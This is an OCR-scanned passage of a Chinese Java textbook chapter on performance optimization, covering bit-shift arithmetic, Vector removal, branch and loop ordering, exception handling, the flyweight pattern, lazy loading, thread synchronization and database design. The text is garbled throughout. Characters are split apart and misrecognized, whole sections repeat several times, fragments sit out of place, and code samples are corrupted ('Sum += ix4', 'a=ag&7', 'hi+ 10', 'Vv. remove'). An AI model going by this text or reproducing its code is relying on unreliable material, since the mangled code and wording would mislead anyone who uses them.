很 多 细微 的 代码 都 可 以 进行 优化 ,其 中 最 常见 的 是 乘法 和 除法 的 优化 。 
考虑 下 面 的 代码 : 


for (i = 0; i < 1000; i++) 
{ 
Sum += ix4; 


。 此 处 如 果 使 用 移 位 来 代 蔡 乘 法 运算 ,可 以 使 性 能 提高 。 
重 写 的 代码 为 : 


for (i = 0; i < 1000; i++) 
. 
sum += (i<<2); 


' 


同样 ,向 右 移 位 相当 于 除 以 2, 比如 ,将 两 个 数字 相 加 之 后 取 平 均值 ,传统 代码 
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v.add("China"); 
} 


网 用 可 以 免除 元 素 的 移动 。 同 样 的 规则 也 适用 于 Vector 类 的 remove() 方 法 。 由 于 
冉 -] ”Vector 中 各 个 元 素 之 间 不 能 含有 “空隙 ", 删 除 最 后 一 个 元 素 之 外 的 任意 其 他 元 素 都 导 
SR 致 被 出 除 元 素 之 后 的 元 素 向 前 移动 。 也 就 是 说 ,从 Vector 删除 最 后 一 个 元 素 要 比 删除 
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假设 要 从 前 面 的 Vector 删除 所 有 元 素 , 可 以 使 用 这 种 代码 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove( 0); 


} 


以 上 代码 性 能 不 佳 ,应 该 改 为 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove(v. size()—1); 


. 


当然 ,从 Vector 类 型 的 对 象 v 删除 所 有 元 素 的 最 好 方法 是 使 用 *v. removeAllElements();” 
语句。 


16.2 算法 优化 


16.2.1 优化 基本 运算 


很 多 细微 的 代码 都 可 以 进行 优化 ,其 中 最 常见 的 是 乘法 和 除法 的 优化 。 
考虑 下 面 的 代码 : 


for (i = 0; i < 1000; i++) 
{ 
Sum += ix4; 


。 此 处 如 果 使 用 移 位 来 代 蔡 乘 法 运算 ,可 以 使 性 能 提高 。 
重 写 的 代码 为 : 


for (i = 0; i < 1000; i++) 
. 
sum += (i<<2); 


' 


同样 ,向 右 移 位 相当 于 除 以 2, 比如 ,将 两 个 数字 相 加 之 后 取 平 均值 ,传统 代码 
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v.add("China"); 
} 


网 用 可 以 免除 元 素 的 移动 。 同 样 的 规则 也 适用 于 Vector 类 的 remove() 方 法 。 由 于 
冉 -] ”Vector 中 各 个 元 素 之 间 不 能 含有 “空隙 ", 删 除 最 后 一 个 元 素 之 外 的 任意 其 他 元 素 都 导 
SR 致 被 出 除 元 素 之 后 的 元 素 向 前 移动 。 也 就 是 说 ,从 Vector 删除 最 后 一 个 元 素 要 比 删除 
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假设 要 从 前 面 的 Vector 删除 所 有 元 素 , 可 以 使 用 这 种 代码 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove( 0); 


} 


以 上 代码 性 能 不 佳 ,应 该 改 为 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove(v. size()—1); 


. 


当然 ,从 Vector 类 型 的 对 象 v 删除 所 有 元 素 的 最 好 方法 是 使 用 *v. removeAllElements();” 
语句。 


16.2 算法 优化 


16.2.1 优化 基本 运算 


很 多 细微 的 代码 都 可 以 进行 优化 ,其 中 最 常见 的 是 乘法 和 除法 的 优化 。 
考虑 下 面 的 代码 : 


for (i = 0; i < 1000; i++) 
{ 
Sum += ix4; 


。 此 处 如 果 使 用 移 位 来 代 蔡 乘 法 运算 ,可 以 使 性 能 提高 。 
重 写 的 代码 为 : 


for (i = 0; i < 1000; i++) 
. 
sum += (i<<2); 


' 


同样 ,向 右 移 位 相当 于 除 以 2, 比如 ,将 两 个 数字 相 加 之 后 取 平 均值 ,传统 代码 
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v.add("China"); 
} 


网 用 可 以 免除 元 素 的 移动 。 同 样 的 规则 也 适用 于 Vector 类 的 remove() 方 法 。 由 于 
冉 -] ”Vector 中 各 个 元 素 之 间 不 能 含有 “空隙 ", 删 除 最 后 一 个 元 素 之 外 的 任意 其 他 元 素 都 导 
SR 致 被 出 除 元 素 之 后 的 元 素 向 前 移动 。 也 就 是 说 ,从 Vector 删除 最 后 一 个 元 素 要 比 删除 
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假设 要 从 前 面 的 Vector 删除 所 有 元 素 , 可 以 使 用 这 种 代码 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove( 0); 


} 


以 上 代码 性 能 不 佳 ,应 该 改 为 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove(v. size()—1); 


. 


当然 ,从 Vector 类 型 的 对 象 v 删除 所 有 元 素 的 最 好 方法 是 使 用 *v. removeAllElements();” 
语句。 


16.2 算法 优化 


16.2.1 优化 基本 运算 


很 多 细微 的 代码 都 可 以 进行 优化 ,其 中 最 常见 的 是 乘法 和 除法 的 优化 。 
考虑 下 面 的 代码 : 


for (i = 0; i < 1000; i++) 
{ 
Sum += ix4; 


。 此 处 如 果 使 用 移 位 来 代 蔡 乘 法 运算 ,可 以 使 性 能 提高 。 
重 写 的 代码 为 : 


for (i = 0; i < 1000; i++) 
. 
sum += (i<<2); 


' 


同样 ,向 右 移 位 相当 于 除 以 2, 比如 ,将 两 个 数字 相 加 之 后 取 平 均值 ,传统 代码 
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v.add("China"); 
} 


网 用 可 以 免除 元 素 的 移动 。 同 样 的 规则 也 适用 于 Vector 类 的 remove() 方 法 。 由 于 
冉 -] ”Vector 中 各 个 元 素 之 间 不 能 含有 “空隙 ", 删 除 最 后 一 个 元 素 之 外 的 任意 其 他 元 素 都 导 
SR 致 被 出 除 元 素 之 后 的 元 素 向 前 移动 。 也 就 是 说 ,从 Vector 删除 最 后 一 个 元 素 要 比 删除 
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假设 要 从 前 面 的 Vector 删除 所 有 元 素 , 可 以 使 用 这 种 代码 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove( 0); 


} 


以 上 代码 性 能 不 佳 ,应 该 改 为 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove(v. size()—1); 


. 


当然 ,从 Vector 类 型 的 对 象 v 删除 所 有 元 素 的 最 好 方法 是 使 用 *v. removeAllElements();” 
语句。 


16.2 算法 优化 


16.2.1 优化 基本 运算 


很 多 细微 的 代码 都 可 以 进行 优化 ,其 中 最 常见 的 是 乘法 和 除法 的 优化 。 
考虑 下 面 的 代码 : 


for (i = 0; i < 1000; i++) 
{ 
Sum += ix4; 


。 此 处 如 果 使 用 移 位 来 代 蔡 乘 法 运算 ,可 以 使 性 能 提高 。 
重 写 的 代码 为 : 


for (i = 0; i < 1000; i++) 
. 
sum += (i<<2); 


' 


同样 ,向 右 移 位 相当 于 除 以 2, 比如 ,将 两 个 数字 相 加 之 后 取 平 均值 ,传统 代码 
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如 下 : 


intmid = (hi+ 10)/2; 


国 同 


实际 上 ,该 代码 可 以 进行 优化 ,可 以 将 两 个 数字 的 和 右 移 ,此 时 CPU 不 需要 做 一 个 除 ， 


法 指令 ,节省 资源 。 | 
Not 
代码 如 下 : | Note | S 


intmid = (hi+ lo)>>1; 


求 余 运 算 也 可 以 进行 优化 ,如 : 


a=as%8; 


可 以 改 为 : 


a=ag&7; 


该 代码 有 助 于 提高 性 能 ,但 如 前 所 述 ,可 读 性 变 差 了 。 
此 外 ,整数 除法 是 整数 运算 中 最 慢 的 ,所 以 应 该 尽 可 能 避免 。 
对 于 连 除 , 有 时 可 以 由 乘法 代替 。 
以 下 是 不 好 的 代码 : 


nt 
m= i/j/k; 


推荐 的 代码 : 


int i, j,k, m; 
m= i/(j* k); 


提示 以 上 操作 的 副作用 是 : 有 可 能 在 乘积 运算 时 ,整数 会 溢出 ,所 以 只 能 在 一 
定 范围 的 除法 中 使 用 。 

另外 ,使 用 增 量 和 减 量 操作 符 也 有 助 于 提高 性 能 。 在 使 用 加 1] 和 减 1 操作 时 ,尽量 
使 用 增 量 和 减 量 操作 符 。 

比如 下 面 这 条 语句 : 


Em 


改 为 : 
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提示 。 增 量 符 语句 比 赋值 语句 更 快 ,对 于 大 多 数 CPU 来 说 ,对 内 存 字 的 增 \ 减 量 
操作 不 必 明 显 地 使 用 取 内 存 和 写 内 存 的 指令 ， 


另外 ,使 用 复合 赋值 表达 式 也 有 助 于 提高 性 能 。 


廊 四 比如 下 面 这 条 语句 : 
下 为 ， 
x+=1; 
更 好 。 


16.2.2 优化 流程 


流程 主要 包括 以 下 两 类 : 选择 和 循环 。 

1. 选择 结构 的 优化 

在 选择 语句 中 ,可 以 利用 一 些 手段 提高 运行 性 能 ,如 : 
。 充分 将 可 能 性 大 的 分 支 写 在 前 面 ; 

。 充分 利用 短路 判断 运算 符 ,等 等 。 

如 下 代码 是 根据 学 生 的 分 数 判 断 其 等 级 : 


public String getGrade( int score) throws Exception 
{ 
String msg = null; 
if(score>= 60&&score<= 100) 
{ 
msg = "通过 "; 
} 
else if(score>= 0&&score<60) 
{ 
msg = "未 通过 "; 


throw new Exception( ); 
} 
return msg; 


上 


该 程序 中 ,根据 学 校 以 往 的 统计 经 验 , 如 果 学 生 不 能 通过 的 概率 较 大 ,那么 第 二 个 
让 分 支 就 可 以 调 到 前 面 去 。 因 此 ,代码 可 以 变 为 : 


public String getGrade( int score) throws Exception 
{ 
String msg = null; 
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if(score>= 0&&score< 60) 

玫 
msg = "未 通过 "; 

} 

else if(score> = 60&&score<= 100) 
msg = "通过 "; 


throw new Exception( ); 
} 
return msg; 


另外 ,短路 运算 符 有 时 也 可 以 提高 性 能 。 
如 下 代码 : 


证 (条 件 1&& 条 件 2) 


可 以 将 不 成 立 概率 较 大 的 条 件 放 在 前 面 。 
又 如 : 


证 (条 件 1| | 条 件 2) 


可 以 将 成 立 概率 较 大 的 条 件 放 在 前 面 。 

另外 ,在 使 用 if-if 结构 和 if-else if 结构 效果 相同 的 情况 下 ,用 if-else if 可 以 使 程序 
减少 不 必要 的 判断 。 

在 用 让 判断 某 些 值 是 否 相等 时 ,尽量 将 变量 作为 比较 的 对 象 。 

如 下 代码 : 


if(a==3) 


改 成 : 


if(3==a) 


更 好 。 这 是 为 了 消除 万 一 程序 员 将 二 二 写成 = 造成 安全 隐患 。 
提示 “代码 :“if(a 一 一 3)” 和 *“if(a 一 3)” 在 C 语言 中 都 能 够 接受 ; 


器 会 报错 。 


在 选择 流程 的 嵌 套 上 ,代码 会 按照 顺序 进行 比较 ,匹配 时 就 跳 转 到 满足 条 件 的 语句 
执行 。 所 以 可 以 对 嵌 套 可 能 的 值 依照 发 生 的 可 能 性 进行 排序 ,把 最 有 可 能 的 放 在 第 一 
位 ,这 样 可 以 提高 性 能 。 


代码 ; “if(3 一 一 a)” 在 C 语言 中 可 以 接受 ,但 是 ,代码 “if(3 一 a)” 却 不 能 接受 ,编译 | 
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比如 ,以 下 代码 得 到 一 个 年 份 的 某 个 月 份 的 天 数 : 


public String getDayNumber( int year, int month) 
{ 
if(year 是 半年 ) 
{ 
// 得 到 各 个 月 份 的 天 数 
} 


else 


// 得 到 各 个 月 份 的 天 数 


} 


如 果 每 个 月 份 被 输入 的 概率 相同 ,那么 就 没有 必要 首先 判断 年 份 是 否 是 闽 年 。 因 


此 ,代码 可 以 改 为 : 


public String getDayNumber( int year, int month) 
{ 
if( 月 份 为 2) 
{ 
// 判断 年 份 是 否 是 头 年 
// 得 到 天 数 
} 
else 
{ 
// 得 到 其 他 各 个 月 份 的 天 数 
} 
} 


综 上 所 述 , 当 if-elseif-else 语句 中 的 分 支 很 多 时 ,为 了 减少 比较 的 次 数 ,明智 的 做 


。 法 是 把 多 分 支 if-elseif-else 语句 转 为 披 套 if-elseif-else 语句 。 把 发 生 频率 高 的 情况 放 


在 一 个 话语 句 中 ,并 且 是 嵌 套 if-elseif-else 语句 的 最 外 层 ,发 生 频 率 相对 低 的 情况 放 在 
另 一 个 让 语句 中 。 

2. 循环 的 优化 

循环 的 特点 是 可 能 会 反复 执行 一 些 代 码 , 因 此 ,在 循环 中 ,有 很 多 可 以 优化 的 场合 ， 
优化 得 好 ,可 以 大 大 提高 系统 性 能 。 

如 下 代码 : 


Vector v; 
for (int i = 0; i <v.size(); i++) 
{ 
// 一 些 操作 
} 


该 代码 中 ,循环 内 i 二 v. size() ;会 反复 执行 ,系统 会 重复 计算 v 的 大 小 。 因 此 ,这 
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段 代 码 可 以 优化 。 
优化 方法 是 : 可 以 让 系统 只 调用 v. size() 一 次 ,代码 如 下 : 


Vector v; 
intn = v. size(); 
for (int i = 0; i<n; ++i) 
{ 
// 一 些 操作 


不 过 ,如 果 是 对 集合 v 进行 反 向 遍历 ,如 下 代码 : 


Vector v; 
for (int i = v.size() - 1; i >= 0; --i) 
{ 

// 一 些 操作 


} 


就 没有 必要 进行 优化 了 ,因为 此 时 v. size() 只 会 调用 一 次 。 
16.3 应 用 优化 


16.3.1 优化 异常 处 理 


异常 处 理 给 开发 带 来 较 大 的 方便 ,但 是 因为 一 个 异常 抛 出 首先 需要 创建 一 个 新 的 
对 象 ,异常 处 理 需要 消耗 底层 资源 。 因 此 ,Exception 降低 性 能 。 在 异常 操作 的 过 程 
中 ,有 了 时候 可 以 对 其 进行 优化 。 如 下 代码 : 


try 
{ 

cus. fun(); 
} 
catch (NullPointerException e) 
{ 

// 处 理 非 正 常 操作 
} 


该 代码 相当 于 抛 出 NullPointerException 时 处 理 非 正常 操作 。 但 是 ,该 代码 也 可 
写成 如 下 形式 : 


if (cus == null) 
{ 

// 处 理 非 正常 操作 
} 


else 
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{ 


cus. fun(); 


} 


比较 这 两 段 代 码 , 从 可 读 性 和 安全 性 上 来 讲 ,前 面 的 代码 比较 好 ; 但 是 从 性 能 上 
讲 , 却 是 后 面 的 代码 比较 好 。 因 此 在 实际 开发 的 过 程 中 ,需要 仔细 权衡 。 


提示 。 在 Java 中 ,异常 需要 消耗 资源 的 原因 是 : Throwable 接口 中 的 构造 器 调 
用 名 为 fillInStackTrace() 的 本 地 方法 ,这 个 方法 负责 检查 栈 的 整个 框架 来 收集 跟踪 信 
息 。 这 样 无 论 有 无 异常 抛 出 , 它 要 求 虚 拟 机 装载 异常 栈 ,消耗 资源 。 

一 般 说 来 ,异常 在 需要 抛 出 的 地 方 抛 出 ,try-catch 能 整合 就 整合 。 

如 下 代码 : 


try 
{ 
// 代码 块 1 
} 
catch(Exceptionl e) 
{ 
// 处 理 Exceptionl 
} 
try 
{ 
// 代码 块 2 
} catch(Exception2 e ) { 
// 处 理 Exception2 


可 以 整合 为 : 


try 
{ 
// 代码 块 1 
// 代码 块 2 
} 
catch(Exceptionl e ) 
{ 
// 处 理 Exceptionl 
} 
catch(Exception2 e ) 
{ 
// 处 理 Exception2 
} 


注意 ,不 到 万 不 得 已 ,不 要 在 循环 中 使 用 异常 捕 提 块 。 
如 下 代码 : 


for(…) 
{ 
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try 
{ 
// 代码 
} 
catch(Exception e ) 
{ 
// 处 理 异 常 


for(…) 
{ 
// 代码 
} 
} 
catch(Exception e) 


// 处 理 异常 


16.3.2 单 例 


单 例 模式 适合 于 一 个 类 只 有 一 个 实例 的 情况 ,可 以 起 到 提高 性 能 的 效果 ,在 本 书 第 
7 章 已 经 进行 了 详细 的 讲解 。 


16.3.3 享 元 


享 元 (flyweight) 模 式 是 一 种 常见 的 软件 设计 模式 ,可 用 于 对 那些 通常 因为 数量 太 
大 而 难以 用 对 象 来 表示 的 概念 或 实体 进行 建 模 。 有 些 项 目 里 ,要 重复 用 到 多 个 对 象 , 那 
么 可 以 让 重复 的 对 象 只 生成 一 个 。 

例如 ,一 个 文档 里 有 30 万 个 汉字 ,每 个 汉字 都 要 显示 出 来 ,如 果 把 每 个 汉字 看 成 一 
个 对 象 ,要 生成 30 万 个 对 象 ,消耗 内 存 。 | 

但 是 ,30 万 个 汉字 有 很 多 重复 的 ,最 后 要 使 用 的 汉字 大 概 几 千 个 ,那么 ,只 需要 实例 
化 几 千 个 对 象 ,把 它们 放 在 一 个 池 ( 享 元 工厂 ) 中 ,要 用 到 的 时 候 ,就 取出 来 ,节省 内 存 。 

因此 , 享 元 模式 运用 了 共享 技术 有 效 地 支持 大 量 细 粒度 的 对 象 ,系统 只 使 用 少量 的 
对 象 ,状态 变化 很 小 ,对 象 使 用 次 数 增多 。 

以 前 面 所 述 的 字 处 理 软件 为 例 ,可 以 用 享 元 模式 来 实现 。 代 码 如 下 : 


import java. util. HashMap; 
interface Flyweight 
{ 

public void display(); 
} 
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class FlyweightWord implements Flyweight 
{ 

public FlyweightWord() 

{ 

System. out. println(" 实 例 化 "); 

1 

private String content; 

public String getContent() 


return content; 
} 
public void setContent(String content) 
{ 


this. content = content; 


} 
public void display() 


{ 


System. out. println(content + " 显示 "); 


} 
class FlyweightFactory 
{ 
private static HashMap flyweightPool = new HashMap(); 
public static Flyweight getFlyweight (String key) 
{ 
FlyweightWord flyweightWord = (FlyweightWord)flyweightPool. get(key); 
if(flyweightWord== null) 
{ 
flyweightWord = new FlyweightWord(); 
flyweightWord. setContent (key); 
// 放 回 池 
flyweightPool. put (key, flyweightWord); 
} 
return flyweightWord; 


public class Flyweight1 
{ 
public static void main(String[ ] args) 
{ 
Flyweight flyweight1 = FlyweightFactory. getFlyweight(" 中 "); 
Flyweight flyweight2 = FlyweightFactory. getFlyweight(" 华 "); 
Flyweight flyweight3 = FlyweightFactory.getFlyweight(" 中 "); 
Flyweight flyweight4 = FlyweightFactory.getFlyweight(" 国 "); 
flyweight1. display(); 
flyweight2. display(); 


flyweight3. display(); 
flyweight4. display(); 
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付出 的 代价 也 是 很 高 的 , 享 元 模式 使 得 系统 更 加 复杂 。 


的 逻辑 复杂 化 。 享 元 模式 将 享 元 对 象 的 状态 外 部 化 ,而 读 取 外 部 状态 使 得 


。 当 以 下 情况 都 成 立时 使 用 享 元 模式 。 


显示 结果 如 图 16-1 所 示 。 可 见 ,. 只 实例 化 3 个 对 象 却 用 了 4 次 。 
享 元 模式 的 有 效 性 很 大 程度 上 取决 于 如 何 使 用 它 以 及 在 何 处 使 用 


一 个 应 用 程序 使 用 了 大 量 的 对 象 ; 

由 于 使 用 大 量 的 对 象 ,造成 很 大 的 存储 开销 ; 
对 象 的 大 多 数 状态 都 可 变 为 外 部 状态 ; 

如 果 对 象 的 内 部 状态 相同 , 则 可 以 用 相对 较 少 的 共享 对 象 取代 图 16-1 
需要 使 用 的 多 个 对 象 ; 

应 用 程序 不 依赖 对 象 标识 。 

享 元 模式 的 优点 在 于 它 大 幅度 地 降低 内 存 中 对 象 的 数量 。 但 是 , 它 做 到 这 一 点 所 


另外 ,为 了 使 对 象 可 以 共享 ,需要 将 一 些 状态 外 部 化 (如 使 用 享 元 池 ) ,这 使 得 程序 
运行 时 间 稍 


微 变 长 。 


16.3.4 ”延迟 加 载 


码 如 下 : 


延迟 加 载 (lazy loading) 策 略 ,是 使 对 象 或 资源 在 需要 的 时 候 才 开 始 分 配 内 存 。 代 


Customer cus = new Customer(); 
if(list. size( )<10) 
{ 
list.add(cus); 
} 


可 改 为 : 


Customer cus = null; 
if(list. size()<10) 
{ 
cus = new Customer(); 
list.add(cus); 
} 


16.3.5 线程 同步 中 的 优化 


由 于 线程 的 同步 可 能 造成 性 能 的 降低 ,因此 ,关于 线程 同步 的 操作 ,要 注意 如 下 几 


个 方面 : 


性 能 的 下 降 。 因 此 ,如 果 程 序 是 单线 程 或 者 在 多 线程 中 不 需要 同步 代码 段 ,就 一 定 不 要 


(1) 能 够 不 用 同步 的 地 方 就 不 要 用 同步 ,在 程序 中 避免 使 用 过 多 的 同步 。 | 
如 果 将 不 必要 同步 的 代码 块 同 步 ,同步 的 安全 性 优势 没有 体现 出 来 ,反而 造成 程序 ， 


使 用 同步 代码 块 。 
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(2) 同步 的 范围 尽量 小 一 些 。 
很 明显 ,如 果 同 步 代 码 范围 大 , 则 在 较 大 的 范围 内 只 能 被 一 个 线程 独占 ,性 能 降低 
的 程度 较 大 ,因此 ,同步 的 范围 应 该 尽量 小 一 些 。 一 般 情况 下 ,如 果 可 以 对 某 个 方法 或 
函数 进行 同步 ,就 尽量 不 要 对 整个 代码 段 进行 同步 。 


16.4 数据 库 的 优化 


16.4.1 设计 上 的 优化 

数据 库 设计 上 ,适当 采用 措施 ,可 以 大 大 提高 访问 性 能 , 现 根据 软件 工程 的 经 验 , 列 
出 以 下 几 点 。 

1. 尽量 给 表 设 置 主键 与 外 键 

很 多 数据 库 产品 中 ,允许 数据 表 不 设置 主键 ,即使 表 中 实体 有 主键 外 键 关 系 , 也 多 


许 不 设置 外 键 。 但 是 ,从 查询 性 能 优化 上 讲 ,一 个 实体 不 能 既 无 主键 又 无 外 键 , 因 为 很 


多 与 索引 有 关系 的 操作 都 要 基于 主键 与 外 键 来 进行 。 
实际 上 ,主键 是 实体 的 高 度 抽象 ,外 键 表 达 了 实体 之 间 的 某 种 对 应 关系 ,主键 与 外 


。 键 的 配对 ,表示 了 实体 之 间 的 连接 。 


2. 适当 破坏 范式 标准 ,以 空间 换取 时 间 
一 般 说 来 , 表 及 其 字段 之 间 的 关系 ,应 尽 可 能 满足 第 三 范式 。 但 是 ,为 了 提高 数据 


。 库 的 运行 效率 ,有 时 可 以 降低 范式 标准 ,适当 增加 一 些 元 余 ,提高 查询 性 能 ,达到 以 空间 
” 换 时 间 的 目的 。 


例如 ,有 一 张 存放 订单 明细 的 表 , 结 构 如 表 16-1 所 示 。 
表 16-1 T_ORDERITEM 
品 名 型 号 单 价 数 量 


T_ORDERITEM 表 的 设计 符合 第 三 范式 。 
但 是 ,考虑 一 种 特殊 情况 .如 果 系统 经 常 进行 统计 总 金额 操作 ,统计 时 将 每 一 种 货 


物 的 单价 和 数量 相 乘 ,然后 加 起 来 ,如 果 统 计 操 作 反复 执行 ,将 会 执行 大 量 的 乘法 ,怎样 
| 避免 大 量 乘法 操作 ,提高 统计 速度 呢 ? 这 就 可 以 在 T_ORDERITEM 表 中 增加 宛 余 字 段 。 


增加 了 宛 余 字段 的 T_ORDERITEM 表 , 如 表 16-2 所 示 。 
表 16-2 T_ ORDERITEM 
型 号 单 价 数 量 金 ” 额 


2 
疏 


在 新 的 T_ORDERITEM 表 中 ,增加 了 “金额 字段 ,由 于 “金额 "可 以 由 “单价 ” 乘 以 


“数量 "得到, 说明 “金额 "是 元 余 字 段 , 因 此 ,该 表 的 设计 不 满足 第 三 范式 。 但 是 这 种 设 
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(2) 同步 的 范围 尽量 小 一 些 。 
很 明显 ,如 果 同 步 代 码 范围 大 , 则 在 较 大 的 范围 内 只 能 被 一 个 线程 独占 ,性 能 降低 
的 程度 较 大 ,因此 ,同步 的 范围 应 该 尽量 小 一 些 。 一 般 情况 下 ,如 果 可 以 对 某 个 方法 或 
函数 进行 同步 ,就 尽量 不 要 对 整个 代码 段 进行 同步 。 


16.4 数据 库 的 优化 


16.4.1 设计 上 的 优化 

数据 库 设计 上 ,适当 采用 措施 ,可 以 大 大 提高 访问 性 能 , 现 根据 软件 工程 的 经 验 , 列 
出 以 下 几 点 。 

1. 尽量 给 表 设 置 主键 与 外 键 

很 多 数据 库 产品 中 ,允许 数据 表 不 设置 主键 ,即使 表 中 实体 有 主键 外 键 关 系 , 也 多 


许 不 设置 外 键 。 但 是 ,从 查询 性 能 优化 上 讲 ,一 个 实体 不 能 既 无 主键 又 无 外 键 , 因 为 很 


多 与 索引 有 关系 的 操作 都 要 基于 主键 与 外 键 来 进行 。 
实际 上 ,主键 是 实体 的 高 度 抽象 ,外 键 表 达 了 实体 之 间 的 某 种 对 应 关系 ,主键 与 外 


。 键 的 配对 ,表示 了 实体 之 间 的 连接 。 


2. 适当 破坏 范式 标准 ,以 空间 换取 时 间 
一 般 说 来 , 表 及 其 字段 之 间 的 关系 ,应 尽 可 能 满足 第 三 范式 。 但 是 ,为 了 提高 数据 


。 库 的 运行 效率 ,有 时 可 以 降低 范式 标准 ,适当 增加 一 些 元 余 ,提高 查询 性 能 ,达到 以 空间 
” 换 时 间 的 目的 。 


例如 ,有 一 张 存放 订单 明细 的 表 , 结 构 如 表 16-1 所 示 。 
表 16-1 T_ORDERITEM 
品 名 型 号 单 价 数 量 


T_ORDERITEM 表 的 设计 符合 第 三 范式 。 
但 是 ,考虑 一 种 特殊 情况 .如 果 系统 经 常 进行 统计 总 金额 操作 ,统计 时 将 每 一 种 货 


物 的 单价 和 数量 相 乘 ,然后 加 起 来 ,如 果 统 计 操 作 反复 执行 ,将 会 执行 大 量 的 乘法 ,怎样 
| 避免 大 量 乘法 操作 ,提高 统计 速度 呢 ? 这 就 可 以 在 T_ORDERITEM 表 中 增加 宛 余 字 段 。 


增加 了 宛 余 字段 的 T_ORDERITEM 表 , 如 表 16-2 所 示 。 
表 16-2 T_ ORDERITEM 
型 号 单 价 数 量 金 ” 额 


2 
疏 


在 新 的 T_ORDERITEM 表 中 ,增加 了 “金额 字段 ,由 于 “金额 "可 以 由 “单价 ” 乘 以 


“数量 "得到, 说明 “金额 "是 元 余 字 段 , 因 此 ,该 表 的 设计 不 满足 第 三 范式 。 但 是 这 种 设 
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计 可 以 消除 在 统计 时 的 大 量 乘法 操作 ,提高 查询 统计 的 速度 .从 算法 策略 上 讲 ,这 是 以 
空间 换 时 间 的 作法 。 

总 提示。 元 余 字 段 的 危害 是 可 能 造成 数据 的 不 一 致 。 例 如 ,如 果 客 户 能 够 自由 输 
入 金额 ,而 不 是 将 金额 用 单价 和 数量 的 乘积 得 到 ,那么 数据 就 矛盾 了 。 

为 了 解决 这 个 问题 ,在 很 多 数据 库 中 ,可 以 将 宛 余 列 确定 为 用 户 不 可 编辑 的 , 即 * 计 
算 列 ”"。“ 人 金额 这样 的 列 就 可 以 (或 者 说 一 定 要 ) 设 置 为 “计算 列 ”, 不 可 手动 修改 ,只 能 | 
通过 “单价 "和 “数量 ” 相 乘 自动 获得 ; 而 “单价 ”和 “数量 ”这 样 的 列 就 一 定 要 被 设置 为 
“数据 列 ”。 

宛 余 分 为 两 种 : 高 级 宛 余 和 低级 完 余 。 前 者 是 允许 的 ,如 一 个 表 中 的 主键 作为 另 
一 个 表 中 的 外 键 时 ,在 那个 表 中 重复 出 现 ; 非 键 字 段 可 以 被 其 他 键 推出 ,这 叫做 低级 宛 
余 。 这 里 讲 的 是 适当 允许 低级 宛 余 。 


3. 将 多 对 多 关系 分 解 成 一 对 多 关系 

在 数据 库 设计 的 过 程 中 ,一 对 多 情况 下 的 设计 比较 容易 ,多 对 多 情况 下 的 设计 相对 | 
复杂 一 些 。 若 实体 之 间 存 在 多 对 多 的 关系 ,就 可 以 将 其 转化 为 若干 个 一 对 多 关系 ,简化 | 
设计 。 

以 最 简单 的 两 个 实体 之 间 的 多 对 多 关系 为 例 ,可 以 在 两 者 之 间 增 加 第 三 个 实体 ， 
关系 实体 ,原来 的 两 个 实体 都 和 这 个 关系 实体 发 生 联系 。 换 名 话说 ,原来 多 对 多 的 关 
系 ,转变 为 两 个 一 对 多 的 关系 。 从 表 设 计 角度 来 讲 , 这 里 的 第 三 个 实体 ,也 应 该 对 应 一 
张 表 ,存储 了 两 个 实体 之 间 复 杂 的 关系 。 

当然 ,如 果 多 个 实体 之 间 有 互相 的 多 对 多 关系 , 依 此 类 推 。 | 

例如 ,在 “教务 系统 ”中 ,课程 ?是 一 个 实体 "学生 "也 是 一 个 实体 。 这 两 个 实体 之 
间 的 关系 ,是 一 个 典型 的 多 对 多 关系 : 一 门 课程 可 以 被 多 个 学 生 选 ,一 个 学 生 又 可 以 选 
多 门 课程 。 

这 种 情况 下 ,要 在 二 者 之 间 增 加 第 三 个 实体 ,该 实体 取 名 为 选课”, 它 的 属性 为 : 
课程 编号 .学 生 学 号 ,分 别 作 外 键 (“课程 "的 主键 ,“ 学 生 ” 的 主键 ) ,使 它 能 与 “课程 ”和 
“学 生 ” 连 接 ; 另外 ,还 包括 选课 的 其 他 信息 ,如 选课 时 间 、 课 程 教师 .课程 分 数 等 。 

4. 科学 地 进行 主键 取 值 

在 数据 库 中 ,主键 唯一 确定 一 条 记录 ,也 是 表 间 连接 和 索引 建立 的 依据 , 主键 可 以 
由 如 下 方法 给 值 : 

。 某 个 唯一 确定 记录 的 列 , 如 学 生 表 中 的 学 号 ; 

。 好 几 个 列 的 组 合 , 如 选课 表 中 的 课程 编号 和 学 生 学 号 的 组 合 ; 

。 一 个 无 物理 意义 的 数字 串 , 当 增加 一 个 行 时 ,程序 自动 给 一 个 新 串 ( 如 可 以 由 程 

序 取 原 来 最 大 串 的 值 加 1) ,等 等 。 

一 般 说 来 ,建议 采用 第 三 种 做 法 。 很 明显 .第 三 种 做 法 花费 的 空间 较 少 ,生成 索引 ， 
时 ,占用 空间 小 ,查询 速度 快 。 不 过 ,如 果 一 定 要 用 字段 组 合 或 者 使 用 单独 字段 作为 主 | 
键 , 字 段 个 数 ,最 好 不 要 太 多 ,或 者 选用 宽度 较 小 的 字段 作为 主键 ,理由 和 前 面 一 样 。 | 

5. 适当 利用 视图 来 保证 数据 安全 性 


视图 是 一 种 虚 表 ,本 身 并 不 存储 数据 ,依赖 于 实际 的 表 存 在 ,是 实际 表 的 一 种 映像 。 
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。 可 以 通过 以 下 手段 来 设计 视图 ; 
。 不 将 数据 表 中 的 保密 数据 显示 在 视图 中 ,而 将 非 保密 数据 在 视图 中 公布 , 源 表 
不 对 用 户 开放 ,只 开放 视图 。 


优 F”” ”有 必要 的 情况 下 ,可 以 设置 多 层 视图 。 特 别 是 在 一 些 权 限 系统 中 ,如 果 用 户 可 
以 查询 同一 个 表 中 的 列 ,权限 越 大 的 用 户 可 以 查询 的 列 数 越 多 ,这 种 情况 下 ,就 
可 以 首先 基于 源 表 创 建 第 一 层 视图 ,公布 的 列 数 较 多 ,面向 权限 最 大 的 用 户 ; 


然后 在 第 一 层 视图 的 基础 上 建立 第 二 层 视图 ,公布 的 列 数 少 一 些 ,面向 权限 次 
之 的 用 户 ; 依 此 类 推 。 不 过 ,视图 的 层 数 也 不 要 太 多 ,否则 运行 缓慢 。 
6. 适当 使 用 * 列 变 行 技术 ,减少 不 必要 的 数据 宛 余 ,提高 性 能 
